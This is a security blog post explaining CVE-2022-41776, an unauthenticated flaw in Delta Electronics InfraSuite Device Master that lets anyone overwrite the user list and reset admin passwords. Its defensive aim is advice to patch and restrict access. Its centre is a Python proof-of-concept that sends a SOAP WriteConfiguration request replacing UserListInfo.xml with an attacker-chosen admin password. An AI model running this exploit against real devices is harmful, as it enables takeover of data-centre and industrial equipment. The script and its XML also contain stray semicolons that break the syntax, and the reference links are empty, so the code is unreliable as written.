Delta Electronics is a well-known provider of power and device management solutions. One of their key products is the InfraSuite Device Master, a tool commonly used in data centers and industrial environments. In late 2022, a critical vulnerability was found in InfraSuite Device Master, tracked as CVE-2022-41776. This flaw could let anyone—without logging in—change or even reset administrative passwords. In this post, we break down how this happens, show sample code, and give you everything you need to know to protect your systems.
What is CVE-2022-41776?
CVE-2022-41776 is an unauthenticated remote vulnerability in the web interface of Delta Electronics' InfraSuite Device Master (versions 00.00.01a and earlier). The web server exposes a function, WriteConfiguration, which is supposed to update configuration files—but it doesn't check if the request comes from an authorized user.
As a result, anyone who can access the Device Master's web interface can trigger this function. One critical file it can change is UserListInfo.xml, which holds information about users—including their passwords.
How Does the Exploit Work?
The web server exposes an endpoint (usually over HTTP port 80 or 443) that allows you to call methods like WriteConfiguration. The vulnerability can be triggered by sending a POST request containing malicious modifications for the UserListInfo.xml file. The server fails to verify authentication before applying the changes.
Proof of Concept (PoC) Code Snippet
Let’s see a basic example using Python’s requests library to exploit CVE-2022-41776.
import requests
# Target details
TARGET = 'http://device-master-ip-or-host'; # change to real IP!
ENDPOINT = '/WS/WebSetting.asmx' # the vulnerable endpoint
# Your malicious UserListInfo.xml content
userlist_xml = '''
<UserList>
<User>
<UserName>admin</UserName>
<Password>5f4dcc3b5aa765d61d8327deb882cf99</Password> <!-- MD5 of 'password' -->
<Role>Administrator</Role>
<Status></Status>
</User>
</UserList>
'''
# SOAP action and headers
headers = {
'Content-Type': 'text/xml; charset=utf-8',
'SOAPAction': 'http://tempuri.org/WriteConfiguration';
}
# SOAP XML body to call WriteConfiguration
soap_body = f'''
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">;
<soap:Body>
<WriteConfiguration xmlns="http://tempuri.org/">;
<strFileName>UserListInfo.xml</strFileName>
<strContent>{userlist_xml}</strContent>
</WriteConfiguration>
</soap:Body>
</soap:Envelope>
'''
# Send the exploit request
r = requests.post(TARGET + ENDPOINT, data=soap_body, headers=headers)
print(f'Status code: {r.status_code}')
print(r.text) # Should return nothing or success
The script doesn't need to log in.
Note: In an actual attack, an adversary could set ANY password or add a new admin user.
Official CISA Advisory:
NVD Entry:
Delta Electronics Product Info:
Bottom Line
CVE-2022-41776 is a textbook case of why authentication must always be enforced—especially on administrative interfaces. If you have Delta Electronics InfraSuite Device Master in your infrastructure, patch it NOW and restrict access while you plan the update. Simple missteps in remote management can quickly lead to an attacker owning your most critical physical infrastructure.
If you want to know more or see vulnerability in action, please refer to the links above or contact your vendor/security team. Don’t wait until you’re locked out of your own network!
Timeline
Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/02/2022 14:04:00 UTC